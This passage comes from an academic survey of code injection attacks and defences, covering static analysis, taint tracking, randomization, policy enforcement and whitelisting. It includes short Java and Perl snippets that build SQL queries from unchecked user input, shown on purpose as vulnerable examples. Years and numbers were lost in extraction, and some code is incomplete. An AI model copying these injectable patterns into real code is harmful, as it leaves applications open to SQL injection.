‘‘exploits’’)’’. an example of the above definition is the following: the code fragment below, defines the operation of addition in the scheme programming language (abelson & sussman, ; dybvig, ): ( d e f i n e ( add x y ) (+ x y ) ) consider the case where instead of a number, a function that leads to an endless loop is passed as an argument by the user. this will cause the interpreter to enter an endless loop and lead to a denial of service. the intuition here is that ‘‘every application that copies untrusted input verbatim into an output program is vulnerable to code injection attacks’’. ray & ligatti ( ) actually proved the above claim based on formal language theory. code injection attacks are one of the most critical class of attacks (francillon & castelluccia, ; su & wassermann, ; baca, carlsson & lundberg, ) due to the following reasons: • they can occur in different layers, such as databases, libraries, native code and the browser. • they span a wide range of security issues, such as viewing sensitive information, editing of personal data, or even stopping the execution of a system. figure presents a categorization of cias divided into two categories. the first involves binary codeand the second sourcecode. weillustrate the attack categoriesand subcategories that have been analyzed in other research papers, in grey color. javascript injection has lately become a prominent subcategory, hence we provide some basic examples in appendix. binary code injection attacks: such attacks involve the insertion of binary code into an application to alter its execution flow and execute malicious compiled code. this category involves buffer-overflow attacks (cowan et al., ; keromytis, ; szekeres et al., ), a staple of security problems. these attacks may occur when the bounds of memory areas are not checked, and access beyond these bounds is possible by the program. based on this, malicious users can inject additional data overwriting the existing data of adjacent memory. from there they can take control over a program or crash it. another attack vector involves format string vulnerabilities. the basis of this defect is the unexpected behaviour of functions with variable arguments. typically, a function that handles a number of arguments has to read them from the stack. if we specify a format string that will make printf expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. if attackers have control over the format string, then they could eiter read from or write to arbitrary memory addresses. c and c++ mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. code injection attacks binary code attacks dynamic language attacks domain-specific language attacks php attacks javascript attacks [...] sql attacks xpath attacks [...] stack smashing attacks heap smashing attacks [...] source code attacks figure a categorization of code injection attacks. the subcategories that have been extensively ana- lyzed in other research papers (lhee & chapin, ; pincus & baker, ) can be seen in grey colour. full-size doi: . /peerjcs. /fig- are two programming languages vulnerable to this kind of attacks since corresponding implementations lack a protection scheme against overwriting data in any part of the memory (mitropoulos et al., ). there are two research papers that present various techniques that belong to this category. in particular, an extensive survey on binary code injection attacks can be found in reference (lhee & chapin, ). furthermore, specific advances in exploiting such vulnerabilities (i.e., heap smashing, arc injection and others) have been presented in reference (pincus & baker, ). finally, the countermeasures used to detect such defects have already been surveyed (younan, joosen & piessens, ) (many of them are also included in a book: das, kant & zhang, —section . ). nevertheless, we include some of them in this survey because they prompted the development of some sophisticated countermeasures. source code injection attacks: code injection also includes the use of source code, either of a domain specific language (dsl) or a dynamic language. note that binary code injection attacks can only occur when the target system is implemented in languages lacking array bounds checking, like c and c++. contrariwise, source code-driven injection attacks can target applications written in various programming languages with different features and characteristics. code injection attacks that involve dsls are critical, as dsls like sql and xml play an important role in the development of web applications. for instance, many web applications have interfaces through which web users enter input to interact with the application’s data. in this way, they interact with the underlying rdbms (relational database management system). typically, this input can become part of an sql statement and then gets executed on the corresponding rdbms. an attack that exploits the defects of these interfaces by taking advantage of input validation issues (e.g., inefficient type handling), is called an ‘‘sql injection attack’’ (cert, ; mitropoulos & spinellis, ). the various techniques used mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. code injection attack countermeasures static analysis dynamic detection simple pattern matching lexical analysis data-flow analysis model checking type system extensions symbolic execution instruction set randomization policy enforcement whitelisting runtime tainting figure the basic categories of code injection attack countermeasures. full-size doi: . /peerjcs. /fig- to perform such attacks have can be found in reference (halfond, viegas & orso, ). instructive examples can be also found in reference (su & wassermann, ). by using very similar techniques to the ones presented in the aforementioned references, attackers can perform other exploits based on dsls, like xml (mattos, santin & malucelli, ) and xpath (su & wassermann, ; cannings, dwivedi & lackey, ; mitropoulos, karakoidas & spinellis, ). a critical class of code injection attacks involve dynamic languages such as python, perl, javascript, and php (seixas et al., ; egele et al., ; son, mckinley & shmatikov, ). in particular, javascript injection attacks comprise a wide subset of dynamic language-driven attacks. such attacks are manifested when an application accepts and redisplays data of unknown origin without appropriate validation and filtering. based on this vulnerability, a malicious user can manage to inject a script in the javascript engine of a browser and alter its execution flow (erlingsson, livshits & xie, ). javascript injection attacks are considered as a crucial issue in application security because they are associated with major vulnerabilities such as: xss attacks (sivakumar & garg, ) and xcs (cross-channel scripting) attacks (wang, ; bojinov, bursztein & boneh, ). as we mentioned earlier, typical examples of javascript injection attacks can be found on the appendix of this paper—a. countermeasures two different basic methods are used to deal with the code injection problem (see fig. ): • static analysis involves the inspection of either source or binary code to find software bugs that could lead to a code injection attack without actually executing the program. • dynamic detection observes the behavior of a running system in order to detect and prevent a code injection attack. in the first case, programmers try to eliminate software vulnerabilities while applications are created (also known as the build-in security (mcgraw, ) concept). the second concept involves the development of methods and tools that secure systems after their mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. deployment. there are numerous approaches that belong to each of these two basic methods and for each approach fig. , provides the corresponding bibliography. static analysis the main concept behind static analysis is to identify security vulnerabilities during the development process. currently, there are many software development processes that include static analysis tools for security as their integral parts (brown & paller, ; gregoire et al., ; fagan, ). from the usage of utilities like grep to complex methods, static analysis has been an evolving approach to detect software vulnerabilities (chess & west, ). initially, the most straightforward approach is the adoption of secure coding practices (howard & leblanc, ; viega & mcgraw, ; mcgraw, ). for example, to prevent an sql injection attack, developers can use specific features provided by the language they use (e.g., java’s preparedstatement object). nevertheless, this does not usually happen, as developers may not be aware of them, or time schedules may be tight, encouraging sloppy practices instead. simple pattern matching during a manual code review it is easy to look for functions associated with code injection defects. using existing tools available in almost every operating system, security auditors can search through a set of files for an arbitrary text pattern. these patterns are commonly specified through a regular expression. accompanied by a well organized list of patterns, the auditor can quickly identify locations at which a program might face security problems. if auditors choose to use utilities like grep and qgrep though, they must check for every vulnerability manually. apart from this, they must have an expert knowledge because there are many different kinds of such defects. furthermore, the analysis these utilities perform is naive. for example there is no distinction between a vulnerable function call, a comment, and an unrelated identifier. hence, a higher prevalence of false positives should be expected (chess & mcgraw, ). finally the output can be disorganized and overwhelming. the distinct disadvantages of pattern scanning and the continuous emergence of new defects were some of the main reasons that led to more sophisticated approaches. lexical analysis lexical analysis is one of the first approaches used for detecting security defects. this is because it is simple and easy to use. lexical analysis is based upon formal language theory and finite state automata (aho et al., ). as a term, it is mostly used to describe the first phase of the compilation process. however, there is no difference between this phase and the method that we describe here (mcgraw, ). the two differ only in the manipulation of their outcome. there are three phases that can be distinguished here, namely: scanning, tokenizing and matching (kantorovitz, ). in the first two phases possible character sequences are recognized, classified and transformed into various tokens. then the resulting sequences are associated with security vulnerabilities. specifically, there are lists that contain entries of vulnerable constructs used during the matching phase. after a successful match an mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. alert message warns auditors, describing the vulnerability and providing them with alternative usages. the lexical analysis approach is implemented by security utilities such as boon (wagner et al., ), pscan (johnson, ; heffley & meunier, ; chen & wagner, ), its (viega et al., ; viega et al., ; wilander & kamkar, ), flawfinder (http://www.dwheeler.com/flawfinder/) (wilander & kamkar, ) and rats (http: //www.security-database.com/toolswatch/rats-v - -rough-auditing-tool-for.html) (kong et al., ; chess & mcgraw, ; wilander & kamkar, ). for the most part, these tools scan source code pointing out unsafe calls of string-handling functions that could lead to a cia. then, they provide a list of possible threats ranked by risk level. this level is usually specified by checking the arguments of such functions. the vulnerability lists are simply constructed making the addition, removal, and modification of an entry quite easy. all the aforementioned tools scan c and c++. this exclusiveness lies on the fact that c and its standard libraries are very susceptible to binary code injection attacks as we mentioned in ‘code injection attacks’. lexical analysis can be flexible, straightforward and extremely fast. with one or more non-processed files as input, and simple descriptions as output, developers can quickly check their code for vulnerabilities. also they can easily update and edit their vulnerability library with new possible threats due to its simplistic nature. although superior to manual pattern matching, this approach has no knowledge of the code’s semantics or how data circulates throughout a program. as a result there are several false positive and negative reports (chess & west, ; cowan, ). note though, that lexical analysis utilities helped the gathering and depiction of a tentative set of security rules in one place for the first time (mcgraw, ). data-flow analysis data-flow analysis is another compiler-associated approach used to discover software defects. it is more sophisticated and more appropriate for a comprehensive code review than lexical analysis. data-flow analysis can be described as a process that gathers details that concern the definition and dependencies of data within a program without executing it (moonen, ; fosdick & osterweil, ). in addition, data-flow analysis algorithms can document all sequences of specific types of events which might occur in a program execution. the key insight of this approach is a control-flow graph (cfg). based on the program’s cfg, this method examines how data moves throughout a program by representing all its possible execution paths (chess & west, ; cahoon & mckinley, ). by traversing the cfg of a program, data-flow analysis can determine where values are generated and where they are used. hence this approach can be used to describe safety properties that are based on the flow of information (abi-antoun, wang & torr, ). as an example: it is very likely that the cfg of a program with an sql injection defect, will include a data-flow path from an input function to a vulnerable operation. for instance, in the following code fragment, user input reaches a method that interacts with a database without any prior validation: mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.dwheeler.com/flawfinder/ http://www.security-database.com/toolswatch/rats-v - -rough-auditing-tool-for.html http://www.security-database.com/toolswatch/rats-v - -rough-auditing-tool-for.html http://dx.doi.org/ . /peerj-cs. uname = r e q u e s t . getparameter ( " username " ) ; s t r i n g query = null ; i f (uname != null ) { query = " select ∗"+ "from t a b l e where uname = ’ "+uname+" ’ " ; r s = stmt . executequery ( query ) ; } e l s e { . . . } as a result, the danger of an sql injection attack is prominent. as it is already clear from the aforementioned example, data-flow analysis is tailored to localize code injection vulnerabilities since it can be applied to associate the unchecked input with the execution of the query and issue a notification. this is why there are numerous adaptations that detect sql injection defects, cross-site scripting vulnerabilities, buffer overflows and others. in addition, most of the creators of such frameworks, claim that with minor changes, their prototypes can be equally applied to also detect other kinds of such defects. contrary to lexical analysis, to counter such anomalies, a data-flow analysis mechanism needs more than a vulnerability library that connects coding constructs with software defects. furthermore, a rule-pack containing specific control flow rules and ad-hoc checkers that run upon the cfg are required. the most common rules used in this method, are the source, the pass-through and the sink rules (chess & west, ). a source rule denotes the starting point of a possible hazard while a sink rule depicts the coding construct where the hazard takes place. in the aforementioned example, a source rule will apply for the first line where input can come from a malicious user. the sink rule on the other hand will refer to the fifth line where attacked-controlled data can reach the database. the pass rule indicates the code that exists between the above two and carries the possibly corrupted data. for the most part, these rules are maintained in external files that use a specific format to describe them. livshits & lam ( ) based their work in the functionality presented above to detect possible sql and javascript injection defects in java applications. nagy & mancoridis ( ) have proposed a number of checkers that locate buffer overflow and format string defects. the idea behind their proposal is to mark all the user-input-related parts of the source code. these checkers are implemented as plug-ins to the codesurfer (http://www.grammatech.com/research/technologies/codesurfer) tool (anderson & zarins, ), a commercial tool that performs data-flow analysis on c/c++ programs. another two indicative tools used to detect injection anomalies are pixy (jovanovic, kruegel & kirda, ) and xssdetect (https://blogs.msdn.microsoft.com/ace_team/ / / /xssdetect- public-beta-now-available/). both of these tools detect cross-site scripting vulnerabilities in web applications. the latter, released by microsoft, runs as a visual studio plug-in and analyzes.netil(intermediatelanguage)whichisread directlyfromthecompiledbinaries. pixy on the other hand, is a standalone open source tool, that examines php scripts. in many cases, rules can appear directly in the code of the program in the form of annotations. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.grammatech.com/research/technologies/codesurfer https://blogs.msdn.microsoft.com/ace_team/ / / /xssdetect-public-beta-now-available/ https://blogs.msdn.microsoft.com/ace_team/ / / /xssdetect-public-beta-now-available/ http://dx.doi.org/ . /peerj-cs. a tool that considers control flow graphs and uses annotations at the same time to find buffer overflows and memory leaks is splint (evans & larochelle, ). findbugs (ayewah & pugh, ; hovemeyer & pugh, ; spacco, hovemeyer & pugh, ) is also a static analyzer based on data-flow analysis. dahse & holz ( ) have proposed a refined type of data-flow analysis to detect second-order vulnerabilities. notably, such vulnerabilities occur when an attack payload is first stored by the application on the web server and then later on used in a security-critical operation. as a more sophisticated approach than lexical analysis, data-flow analysis exhibits fewer false positives and negatives than the former. for example, many buffer overflows are not exploitable because the attacker cannot handle the data that overflows the buffer. by using this method, an auditor can in fact distinguish exploitable from non-exploitable buffer overflows. the advantage of data flow static analysis is that it can identify vulnerabilities that could actually occur when real application paths are exercised and not just dangerous coding constructs. model checking model checking is a formal verification approach developed based on graph theory and finite state automata (clarke, emerson & sifakis, ; merz, ). a software model checking framework accepts a system’s source or binary code as input and checks automatically if it satisfies specific properties. first, the framework analyzes statically the code to extract a high-level representation of the system, namely a model. this model usually corresponds to a control-flow graph or a pushdown automaton (beyer et al., ; chen & wagner, ). the properties are often expressed either as assertions, as formulas of temporal logic, or as finite state automata (pnueli, ; miller, donaldson & calder, ). by traversing every execution path of the model, the framework determines whether certain states represent a violation of the provided properties. there is a great number of dangerous programming practices that can be accurately modeled with equivalent security properties. for example, the chroot system call should be followed by a call to chdir ("/"). otherwise, the current working directory could be outside the isolated hierarchy and provide access to a malicious user via relative paths. with a high-level representation of the system at hand and by using ad-hoc algorithms (reps, horwitz & sagiv, ), properties like the above can be easily checked. likewise, it is possible to state the detection of code injection defects as a reachability problem (tsitovich, ). there are many tools based on model checking to detect software vulnerabilities. classic tools include spin (holzmann, ), smv (mcmillan, ) and mops (chen & wagner, ; schwarz et al., ). these tools are representative of the approach but they do not support the detection of cia defects. qed is a model checking system that accepts as input web application written in the standard java servlet specification (https://jcp.org/aboutjava/communityprocess/final/jsr /) and examine them for various code injection vulnerabilities (martin & lam, ). also, fehnker, huuck & rödiger ( ) have proposed a model checking approach to detect binary code injection defects in embedded systems. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://jcp.org/aboutjava/communityprocess/final/jsr / http://dx.doi.org/ . /peerj-cs. the users of a model checking tool do not need to construct a correctness proof. instead, they just need to enter a description of the circuit or program to be verified and the specification to be checked. still, writing specifications is hard and code reviewers with experience are needed. one of the key features of model checking is that it can either reassure developers that the system is correct or provide them with a counterexample. as a result, together with the discover of a security issue, auditors are provided with a possible solution. a major problem in model checking is the state explosion issue (clarke, emerson & sifakis, ; merz, ). the number of all states of a system with many processes or complicated data structures can be enormous. symbolic execution symbolic execution generalizes testing by using unknown symbolic variables during evaluation (king, ; cadar et al., ). in essence, it provides the means to analyze a program to determine which inputs cause each part of a program to execute. this concept can be easily adapted to detect vulnerabilities that may lead to code injection attacks. to counter sql injection attacks, fu & qian ( ) have proposed safeli. first, safeli analyzes the code to detect code constructs used by the application, to interact with a database. at each location that submits an sql query, an equation is constructed to find out the initial values that could lead to a security breach. the equation is then solved by a hybrid string solver where the solution obtained is used to construct test cases. if a defect is detected, an attack is replayed by the tool to developers. ruse, sarkar & basu ( ) detect sql injection vulnerabilities in a similar manner. in addition, rubyx (chaudhuri & foster, ) follows a similar approach to counter javascript injection attacks in applications written in ruby. s (trinh, chu & jaffar, ) is a symbolic string solver that can be used to detect vulnerabilities that may lead to sql injection and xss attacks. to do so, it makes use of a symbolic representation so that membership in a set defined by a regular expression can be expressed as a string equation. then, there is a constraint-based generation of instances from these expressions so that the number of instances can be limited. saxena et al. ( ) have proposed a framework called kudzu, to detect javascript injection attacks. to achieve this, kudzu explores the application’s execution space by creating test cases. then, like safeli, kudzu uses a solver which is implemented by the authors in order to overcome the complexity of javascript’s string operations. finally, by using data-flow analysis, it identifies possible defects based on specific sink rules (see ‘data-flow analysis’). klee (cadar, dunbar & engler, ) was the first symbolic execution engine introduced to detect software bugs in an efficient manner. such bugs include defects that may lead to binary code injection attacks. in addition, mergepoint (avgerinos et al., ) is a binary-only symbolic execution system for large-scale testing of commodity software. notably, it is based on veritesting, an approach that employs the merging of execution paths during static symbolic execution, to reinforce the effects of dynamic symbolic execution. symbolic execution has also been used together either with genetic algorithms to detect javascript injection attacks (avancini & ceccato, ) or with runtime tainting mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (see ‘runtime tainting’) to detect sql injection attacks (corin & manzano, ). symbolic execution shares a similar problem with model checking (see ‘model checking’). symbolically executing all program paths does not scale with large programs since the number of feasible paths grows exponentially. type system extensions a type system is a collection of rules that assign a property called a type to the various constructs of a program (pierce, ). one of the most typical advantages of static type checking is the discovery of programming errors at compile time. as a result, numerous errors can then be detected immediately, rather than discovered later upon execution. for the most part, type extensions aim to overcome the problems of integrating different programming languages. for instance, the integration of sql with the java programming language is typically realised with the jdbc application library (fisher, ellis & bruce, ). by using it, the programmer has to pass the sql query to the database as a string. thought this process, the java compiler is completely unaware of the sql language contained within the java code paving the way for an sql injection attack (recollect the example of ‘data-flow analysis’). type-safe programming interfaces like sql dom (domain object model) (mcclure & krüger, ) and the safe query objects (cook & rai, ) were two of the first attempts to detect sql injection attacks via type extension. both of the above mechanisms act as preprocessors and translate an sql database schema into the host general purpose language. the generated collection of objects is used as an application library for the main application, thus ensuring type safety and syntax checking at compile-time. sqlj (eisenberg & melton, ) is a language extension of java that supports sql. it offers type and syntax checking for both languages at compile-time. sugarj (erdweg, ) provides a method through which languages can be extended with specific syntax, in order to embed dsl’s. the major contribution of this framework is that can be easily applied on many languages as host languages. currently it supports java, haskell and prolog. all the aforementioned mechanisms wipe out the relationship between untyped java strings and sql queries, but do not address legacy code. in addition, developers require to learn a new api to use them. webssari is used to verify web applications (xie & aiken, ) written in php. it is based on denning’s lattice model which analyzes the information flow of a program (denning & denning, ) and uses type qualifiers to associate security classes with variables and functions that can lead to sql injection defects. wassermann & su ( ) have proposed an approach that deals with static analysis and coding practices together (wassermann & su, ) to detect sql injection attacks. specifically, they analyze the application’s code to locate queries that are considered unsafe. to achive this, they use context free grammars and language transducers (minamide, ). type extensions is a formal way to wipe out code injection defects, but they have a distinct disadvantage: programmers need to learn new constructs and modify their code in multiple places. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. dynamic detection dynamic detection involves the development of methods and tools to fortify such applications without actually removing the defects from the application’s code. a great number of methods that belong to this category involves some kind of dynamic program analysis (boujarwah, saleh & al-dallal, ). dynamic analysis requires a running system and involves sufficient test inputs to examine the behavior of a system. runtime tainting runtime tainting is based on data-flow analysis (see ‘data-flow analysis’). in practice, it enforces security policies by marking untrusted (‘‘tainted’’) data and tracing its flow through the program. runtime tainting may be viewed as an approximation of the verification of non-interference (von oheimb, ) or the more general concept of secure information flow. since information flow in a system cannot be verified by examining a single execution trace of the system, the results of taint analysis will necessarily reflect approximate information regarding the information flow characteristics of the system to which it is applied. runtime tainting is a feature in some programming languages, such as perl (http: //search.cpan.org/~rhandom/taint-runtime- . /lib/taint/runtime.pm) and ruby. the following perl code is vulnerable to sql injection since it does not check the value of the $foo variable, which is instantiated by user input: # ! / u sr / bin / p e r l my $name = $cgi−>param ( " foo " ) ; . . . $dbh−>taintin = ; $dbh−>e x ec u te ( " select ∗ from u s e r s where name = ’ $foo ’ ; " ) ; if taint mode is turned on, perl would refuse to run the command and exit with an error message, because a tainted variable is being used in a query. sigfree (wang et al., ) is a mechanism that follows this method to counter buffer overflow attacks by detecting the presence of malicious binary code. this is based on the fact that such attacks typically contain executable code while legitimate requests never contain executable code. however, this is not always the case and therefore the mechanism suffers from false alarms. lift (qin et al., ) also counters binary code injection attacks in a similar manner. the system by haldar, chandra & franz ( ) provides runtime tainting for applications written in java, while the work by xu, bhatkar & sekar ( ) covers applications written in c. securifly (martin, livshits & lam, ) is a similar mechanism based on pql (http://pql.sourceforge.net/) (program query language), which is a language for expressing patterns of events on objects. a dynamic checking compiler called wasc (nanda, lam & chiueh, ) includes runtime tainting to prevent javascript injection attacks. to counter similar attacks, php aspis (papagiannis, migliavacca & pietzuch, ) applies partial taint tracking at the mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://search.cpan.org/~rhandom/taint-runtime- . /lib/taint/runtime.pm http://search.cpan.org/~rhandom/taint-runtime- . /lib/taint/runtime.pm http://pql.sourceforge.net/ http://dx.doi.org/ . /peerj-cs. language level to augment values with taint meta-data in order to track their origin. vogt et al. ( ), use runtime tainting to prevent javascript injection attacks. this is done by inspecting the information flow within the browser. when critical information is about to be sent to a third party, the web user decides if this should be allowed or not. stock et al. ( ) have proposed a method that operates on the client-side too. this method uses a taint-enhanced javascript engine that tracks the flow of data controlled by the attacker. to detect an attack, the method uses html and javascript parsers that can identify the generation of malicious code coming from tainted data. runtime tainting has been partially or fully used in other similar approaches (nadji, saxena & song, ; sekar, ; nguyen-tuong et al., ). notably, such approaches may require numerous changes to the compiler or the runtime system. in positive data flow tracking, tagged data is considered to be legitimate. information flow control (ifc) mechanisms employ positive taint tracking to prevent javascript- driven xss attacks on the browser. representative implementations such as jsflow (hedin et al., ), cowl (stefan et al., ) and the framework by bauer et al. ( ) allow programmers to express information flow policies by extending the type system of javascript. then, the policies are checked at runtime by the javascript interpreter through dynamic checks. instruction set randomization another approach that has been previously proposed as a generic methodology to counter code injection attacks is instruction set randomization (isr) (keromytis, ; kc, keromytis & prevelakis, ). the concept behind isr is to create an execution environment that is unique to the running process. this environment is created by using a randomization algorithm. hence, an attack against this system will fail as the attacker cannot guess the key of this algorithm. the main issue with this approach is that it uses a cryptographic key in order to match the execution environment. as a result, security depends on the fact that malicious users cannot discover the secret key. note that, randomization algorithms are also employed in another popular technique that has been extensively used to prevent binary code injection attacks, address space layout randomization (aslr) (shacham et al., ). to do so, aslr randomly arranges the address space positions of critical data areas of a process such as the base of the executable and the positions of the stack and heap. sqlrand (boyd & keromytis, ) is based on isr to detect sql injections in the following manner: initially, it allows developers to create queries using randomized instructions instead of standard sql keywords. the modified sql statements are either reconstructed at runtime using the same key that is inaccessible to the attacker, or the user input is tagged with delimiters that allow an augmented sql grammar to detect the attack. even if sqlrand imposes a low computational overhead, it imposes an infrastructure overhead since it requires the integration of a proxy. in the case of javascript, consider a xor function that encodes all javascript source of a web page on the server-side and then, on the client-side, the web browser decodes the source by applying the same function again. implementations of this approach include: mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. noncespaces (gundy & chen, ) and xjs (athanasopoulos et al., ). smask (johns & beyerlein, ) identifies malicious code by automatically separating user input from legitimate code by using javascript and html keyword masking (in a way similar to sqlrand boyd & keromytis, ). even if isr is theoretically a sound approach for countering code injection, these implementations have flaws. for example, noncespaces does not protect from persistent data injection. xjs does not have such problems and covers a wide variety of javascript injection attacks. policy enforcement policy enforcement is mainly associated with database security (thuraisingham & ford, ; null & wong, ; chlipala, ; son, chaney & thomlinson, ) and operating system strict access controls (winsor, ; hicks et al., ). in such contexts, policies expressed in specific languages (anderson, ), usually limit information dissemination to authorized entities only. currently, policy enforcement is one of the most common approaches to detect javascript injection attacks. in this approach, web developers define security policies on the server-side. then, these policies are enforced either in the user’s browser or on a server-side proxy that intercepts all html responses. all modern browsers include a javascript (js) engine to support the execution of javascript. most js engines employ restrictions like the same origin policy (takesue, ) and a sandbox mechanism (dhawan & ganapathy, ). in particular, scripts run in a sandbox where they can only perform web-related actions and not general-purpose programming tasks (e.g., creating files) (dhawan & ganapathy, ). also, scripts are constrained by the same origin policy. this policy permits scripts running on pages originating from the same site to access each other’s methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites (takesue, ). still, such schemes cannot stop malicious users from injecting scripts into the user’s browser. consider a legitimate web page that does not validate the input posted by its users. by exploiting this vulnerability, an attacker can post data that will inject javascript into a dynamically generated page. thus the attacker can trick a legitimate user into downloading a well-hidden script from this host in order to steal the user’s cookies. this injected script is confined by a sandboxing mechanism and conforms to the same origin policy, but it still violates the security of the browser (de groef et al., ; saiedian & broyle, ). implementations of this approach include mechanisms such as browsershield (reis et al., ) and corescript (yu et al., ). both mechanisms intercept javascript code on a page as it executes and rewrite it in order to check if it is subject to server-provided, vulnerability descriptions. such implementations impose a significant overhead due to the javascript rewriting. dsi (nadji, saxena & song, ), met (erlingsson, livshits & xie, ), and beep (jim, swamy & hicks, ) require source modifications by the web developers in order to introduce their policies. specifically, in met the security policies are specified as javascript functions and they are included at the top of every web page while in beep web developers need to write security hooks for every embedded script of the application. blueprint (louw & venkatakrishnan, ) is a policy enforcement framework mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that uses parsed trees to detect javascript injection attacks. however, to use it developers need to learn and use a new api in order to correctly escape dynamic content. google caja (http://code.google.com/p/google-caja/) is another policy enforcement approach provided by google. it is based on the object-capability security model (mcgraw, ) and it aims to control what embedded third party code can do with user data. a security layer called ‘‘content security policy’’ (csp) (stamm, sterne & markham, ) was first introduced into firefox to detect various types of attacks, including cross- site scripting https://developer.mozilla.org/en/introducing_content_security_policy. currently, it is supported by almost all the available browsers. to eliminate such attacks, web site administrators must specify which domains the browser should treat as valid sources of script and which not. then, the browser will only execute scripts that exist in source files from white-listed domains. notably, autocsp (fazzini, saxena & orso, ) and dedacota (doupé et al., ) are two schemes that are based on csp. apart from javascript injection attacks, policy enforcement has been also used to detect binary code injection attacks. specifically, kiriansky, bruening & amarasinghe ( ) have proposed program shepherding which monitors control flow transfers in order to restrict execution privileges based on code origins and ensure that program sandboxing will not be breached. in a similar manner, control-flow integrity (cfi) (abadi et al., ), follows a predetermined flow graph that serves as a specification of control transfers allowed in the program. then, at runtime, specific checks enforce this specification. adaptations of cfi include control-pointer integrity (cpi) (kuznetsov et al., ) and cryptographically enforced control flow integrity (ccfi) (mashtizadeh et al., ). the former ensures the integrity of all pointers in a program (e.g., function pointers) and as a result prevents different attacks. the latter employs message authentication codes (macs) to protect elements such as return addresses and function pointers. in general, cfi implementations track control edges separately, without taking into account the context of preceding edges. context-sensitive cfi (van der veen et al., ) provides enhanced security by considering the backward and forward edges of the graph too. notably, there is a number of attempts to overcome cfi. for instance, göktas et al. ( ) have indicated that cfi can be bypassed by using return oriented programming (rop) (buchanan et al., ). through rop, attackers can gain control of the call stack to hijack program control flow. to do so, they execute specific machine instruction sequences that are already presented in machine’s memory. whitelisting whitelisting approaches are based on the features of denning’s original intrusion detection framework (denning, ). in the code injection context, a whitelisting mechanism registers all valid benign code statements during a learning phase. this can be done in various ways according to the implementation. then, only those will be accepted, approved or recognized during production. javascript injection whitelisting approaches generate and store valid javascript code in various forms, and detect attacks as outliers from the set of valid code statements. swap (wurzinger et al., ) registers all the benign scripts that exist in the original application mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://code.google.com/p/google-caja/ https://developer.mozilla.org/en/introducing_content_security_policy http://dx.doi.org/ . /peerj-cs. and stores an identifier for every benign script. then, a javascript detection component placed in a proxy searches for malicious scripts in the server’s responses. if no malicious scripts are detected, the proxy forwards the response to the client-side. note that, this approach is inflexible since it does not support dynamic scripts. similar limitations exist in xss-guard (bisht & venkatakrishnan, ), which maps benign scripts to http responses. to support dynamic scripts during the creation of the legitimate identifiers the authors of xssds (johns, engelmann & posegga, ) substitute string-tokens with specified identifiers. in the case of dsl-driven injection attacks the various countermeasures follow a similar pattern. didafit (lee, low & wong, ) detects sql injection attacks by registering all benign database transactions. subsequent improvements by valeur, mutz & vigna ( ) tagged each benign transaction with the corresponding web application. to do so, they have extended their anomaly detection framework called libanomaly (http: //seclab.cs.ucsb.edu/academic/projects/projects/libanomaly/). furthermore, amnesia (halfond & orso, b; halfond & orso, ) is a tool that detects sql injection attacks by associating a query model with the location of every query in the web application. then in production mode, monitors the execution of the application to examine when queries diverge from the expected model. sqlguard (buehrer, weide & sivilotti, ) is another mechanism that detects sql injection attacks based on parse tree validation. in particular, the mechanism compares the parse tree of the query before the inclusion of user input with the one resulting after the inclusion of user input. if the trees diverge, the application is probably under attack. diglossia (son, mckinley & shmatikov, ) also uses parse trees to detect code injection attacks. the main idea behind diglossia is based on the theory introduced by ray and ligatti in reference (ray & ligatti, ). apart from sql injection attacks, it can also be used to detect another emerging type of attacks: nosql (chodorow & dirolf, ) injection attacks (see also ‘emerging challenges’). sdriver (mitropoulos & spinellis, ; mitropoulos, karakoidas & spinellis, ; mitropoulos et al., ) is a mechanism that prevents sql and xpath injection attacks against web applications by using location- specific signatures. the signatures are generated during a learning phase, and are based on elements that can depend either on the query or on its execution environment (for example the stack trace). then, during production, the mechanism checks all queries for compliance and can block queries containing injected elements. by associating a stack trace with the origin of a query, the mechanism can correlate sql statements with their call sites. this increases the specificity of the stored signatures and avoids false alarms. nsign (mitropoulos et al., ) and sicilian (soni, budianto & saxena, ) follow the same approach as sdriver to prevent xss attacks on the client-side. to do so, nsign includes script origins and the type of a script as environment elements, and javascript keywords and their number of appearance as elements coming from the code that is about to be executed. sicilian on the other side, includes more elements from the script (class names, variavle names and more) and less from the environment. laranjeiro et al. (laranjeiro, vieira & madeira, ; antunes et al., ; laranjeiro, vieira & madeira, ) have proposed a similar mechanism to detect both sql and mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://seclab.cs.ucsb.edu/academic/projects/projects/libanomaly/ http://seclab.cs.ucsb.edu/academic/projects/projects/libanomaly/ http://dx.doi.org/ . /peerj-cs. also known in statistics as type i and type ii errors (peck & devore, ). xpath injection attacks in web services. when it is not possible to run a complete learning phase, a set of heuristics is used by the mechanism to accept or discard doubtful cases. finally, mattos, santin & malucelli ( ) developed an signature-based attack detection engine that utilizes ontologies to counter xml and xpath injection attacks. by using ontologies to model data provides explicit and formal semantic relationships between data and possible attacks. analysis and discussion we have analyzed the mechanisms described earlier based on the requirements mentioned in ‘introduction and covered area’. tables and illustrate the comparison summaries of the static and dynamic countermeasures. flexibility flexibility indicates if an approach can be adjusted in order to detect different attacks categories. typically, all approaches, except for lexical analysis 